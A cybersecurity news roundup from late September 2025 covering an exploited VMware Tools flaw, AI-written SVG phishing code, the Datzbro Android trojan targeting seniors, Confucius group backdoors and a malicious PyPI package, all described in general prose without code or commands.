VMware Exploit Attacks, AI Phishing Alert, Android Trojan Hijack – Cybersecurity News [September 29, 2025]
It was a busy week for cybersecurity threats. Hackers exploited a flaw in VMware software, giving them full control over virtual machines. At the same time, Microsoft flagged a phishing campaign that used AI written code in fake file sharing emails to trick victims. A new Android Trojan, Datzbro, also spread through fake senior community apps, letting criminals take over phones. To top it off, the Confucius group launched fresh phishing attacks, and researchers found a malicious Python package that secretly installed backdoors on Windows systems.
VMware Zero Day Exploited in Attacks by UNC5174 Group
A major security flaw in VMware Tools and VMware Aria Operations, tracked as ‘CVE-2025-41244’, has been actively exploited in the wild since at least last October. With a severity rating of 7.8, it allows hackers with basic user access on a virtual machine to gain full root privileges. The vulnerability affects a range of VMware products, including Cloud Foundation, vSphere Foundation, Telco Cloud, and various versions of VMware Tools for both Windows and Linux. VMware has already released updates to address the problem, and Linux vendors are also working on their own fixes.
Researchers from NVISO Labs discovered the exploit during an incident response investigation. The problem is rooted in how VMware’s software checks system processes. A coding oversight allows a broad pattern match, which means an attacker can place a fake binary in a temporary folder and trick the service into running it with elevated permissions. This gives them complete control inside the virtual machine. The attacks have been linked to a threat group known as ‘UNC5174’, which has a track record of exploiting bugs in enterprise software.
Microsoft Flags AI-Generated Code in New Phishing Attack
Microsoft has flagged a phishing campaign from late August, where it looks like attackers used AI to write code for their malicious files. The attack, which was spotted in late August, shows how criminals are starting to use large language models to make their scams more effective and more challenging to detect. It all started with emails sent from compromised business accounts, which looked like everyday file sharing notifications with a PDF attachment. But the attachment was actually an SVG file containing hidden scripts.
When someone clicks the file, they are redirected to a fake login page. The page even included a fake CAPTCHA to make it seem more legitimate. What really stood out was the code itself. It was written to look like a business analytics dashboard, using terms like “revenue” and “operations.” Microsoft believes this overly detailed, structured style is a clear sign that an AI model was used to write it. Even though the attack was minor and quickly shut down, it’s part of a growing trend where AI is used to create sneaky code that can fool both people and security software.
Android Trojan Exploits Social Groups to Hijack Devices
Security researchers have found a new Android banking trojan named ‘Datzbro’, which is spreading through fake social group apps that target senior citizens. The scam starts in social media groups that promote social events and trips for senior citizens. When any user expresses interest, they are contacted through messaging apps and given links to download what they think are registration apps for these activities. The fake apps have names like “Senior Group,” “Lively Years,” and “ActiveSenior” to appear legitimate.
But instead of providing community features, these apps install powerful malware. Datzbro is able to take complete control of a device, letting it record audio, take pictures, steal files, and log keystrokes. It can even use accessibility permissions to carry out transactions, steal banking information, and capture lock screen PINs. One of its standout features lets attackers recreate a victim’s screen on their own system, making it easier to control the device remotely while hiding their actions behind a black overlay. Researchers also found hints that the attackers are getting ready to target iOS devices soon. Datzbro’s blend of spying and financial fraud makes it a significant threat, highlighting how easily trust and social connections can be exploited to put both devices and finances at risk.
Confucius Hackers Roll Out New Backdoor in Phishing Campaigns
The long running hacking group Confucius is at it again, with new phishing campaigns targeting sensitive organisations across South Asia. They’ve been active since 2013, typically using spear phishing and malicious documents to hit government, defence, and other critical industries. Researchers spotted them in December 2024 using malicious PowerPoint files to sneak in a data harvesting malware called WooperStealer. A few months later, in March 2025, they were using Windows shortcut files to deliver the same malware. By August, they changed things up again, using those same shortcut files to deploy a new Python based backdoor named Anondoor.
Once it’s on a system, Anondoor gives attackers the ability to steal system information, run commands, take screenshots, and lift browser passwords. Researchers have noted that Confucius is getting better at hiding its activity by layering its obfuscation techniques and adapting its malware to meet new intelligence goals. This strategy is similar to other groups in the region, like Patchwork, which also reuses proven methods like malicious macros and shortcut files to deliver new and updated malware. It just goes to show how these threat actors are constantly refining old tricks to stay effective.
Soopsocks Python Package Drops Windows Backdoor via PowerShell
Researchers recently found a malicious Python package on PyPI called soopsocks that pretended to be a tool for creating a SOCKS5 proxy service. In reality, it was secretly installing a Windows backdoor. Before getting removed, the package had already been downloaded over 2,600 times. When installed, it ran hidden scripts to execute PowerShell commands, adjust firewall rules, and try to gain higher privileges. The malware would also gather system information and send it off to a hard-coded Discord webhook. To make sure it stayed on the system, it set itself up as a service with scheduled tasks to restart after a reboot.
This discovery comes as more attention is being paid to software supply chain security. In response to similar threats, GitHub is tightening its policies for npm tokens, and security vendors are rolling out new tools to block malicious packages automatically. The soopsocks incident is another clear example of how attackers are weaponizing open source platforms by hiding malware inside seemingly useful tools.